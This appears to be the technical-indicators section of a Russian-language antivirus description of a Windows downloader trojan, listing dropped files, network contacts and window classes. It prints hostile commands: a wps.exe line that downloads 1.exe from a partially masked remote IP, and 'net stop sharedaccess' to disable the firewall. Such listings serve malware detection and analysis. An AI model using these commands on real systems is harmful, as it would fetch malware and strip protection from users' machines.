Техническая информация
- C:\1.exe
- %TEMP%\Rar$DR06.501\daps\wps.exe -url="http://61.##7.115.210/ftp_doyo/1.exe" -param="" -s -local_dir="c:\"
- %TEMP%\irsetup.exe
- C:\1.exe (загружен из сети Интернет)
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\net.exe stop sharedaccess
- %TEMP%\irsetup.ini
- %TEMP%\Rar$DR06.501\daps\wps.exe
- C:\1.exe.dt!
- %TEMP%\irsetup.exe
- %TEMP%\irsetup.dat
- %TEMP%\suf6lng.4
- %TEMP%\irsetup.dat
- %TEMP%\irsetup.ini
- %TEMP%\suf6lng.4
- C:\1.exe.dt! в C:\1.exe
- '61.##7.115.210':80
- 61.##7.115.210/ftp_doyo/1.exe
- ClassName: 'MS_WINHELP' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''